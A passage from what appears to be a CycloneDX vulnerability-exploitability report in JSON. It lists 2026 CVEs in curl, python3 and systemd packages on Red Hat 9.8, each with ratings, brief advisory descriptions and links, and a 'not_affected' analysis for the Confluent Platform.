        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3783",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer\nperforms a redirect to a second URL, curl could leak that token to the second\nhostname under some circumstances.\n\nIf the hostname that the first request is redirected to has information in the\nused .netrc file, with either of the `machine` or `default` keywords, curl\nwould pass on the bearer token set for the first host also to the second one.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3783"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/2"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55439"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3783"
        },
        {
          "url": "https://bugzilla.redhat.com/2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/2496763"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446448"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446450"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496758"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496763"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3783.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3783"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8286"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-9547"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-55439.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:55439"
        },
        {
          "url": "https://github.com/advisories/GHSA-8whr-249c-vfjp"
        },
        {
          "url": "https://hackerone.com/reports/3583983"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3783.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3783"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3783"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3784",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        305
      ],
      "description": "curl would wrongly reuse an existing HTTP proxy connection doing CONNECT to a\nserver, even if the new request uses different credentials for the HTTP proxy.\nThe proper behavior is to create or use a separate connection.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3784"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/11/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3784"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-3784.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-5q3w-6p3j-mw6p"
        },
        {
          "url": "https://hackerone.com/reports/3584903"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-3784.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55450.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3784"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8084-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8099-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3784"
        }
      ],
      "published": "2026-03-11T11:16:00+00:00",
      "updated": "2026-06-17T10:44:12+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "7.76.1-40.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/curl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-40.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-4105",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        284
      ],
      "description": "A flaw was found in systemd. The systemd-machined service contains an Improper Access Control vulnerability due to insufficient validation of the class parameter in the RegisterMachine D-Bus (Desktop Bus) method. A local unprivileged user can exploit this by attempting to register a machine with a specific class value, which may leave behind a usable, attacker-controlled machine object. This allows the attacker to invoke methods on the privileged object, leading to the execution of arbitrary commands with root privileges on the host system.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4105"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7299"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4105"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447262"
        },
        {
          "url": "https://github.com/systemd/systemd/security/advisories/GHSA-4h6x-r8vx-3862"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4105"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4105"
        }
      ],
      "published": "2026-03-13T19:55:13+00:00",
      "updated": "2026-06-17T10:55:59+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "252-67.el9_8.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/systemd-pam@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/systemd-rpm-macros@252-67.el9_8.4?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/systemd@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/systemd-libs@252-67.el9_8.4?arch=x86_64&distro=redhat-9.8"
        },
        {
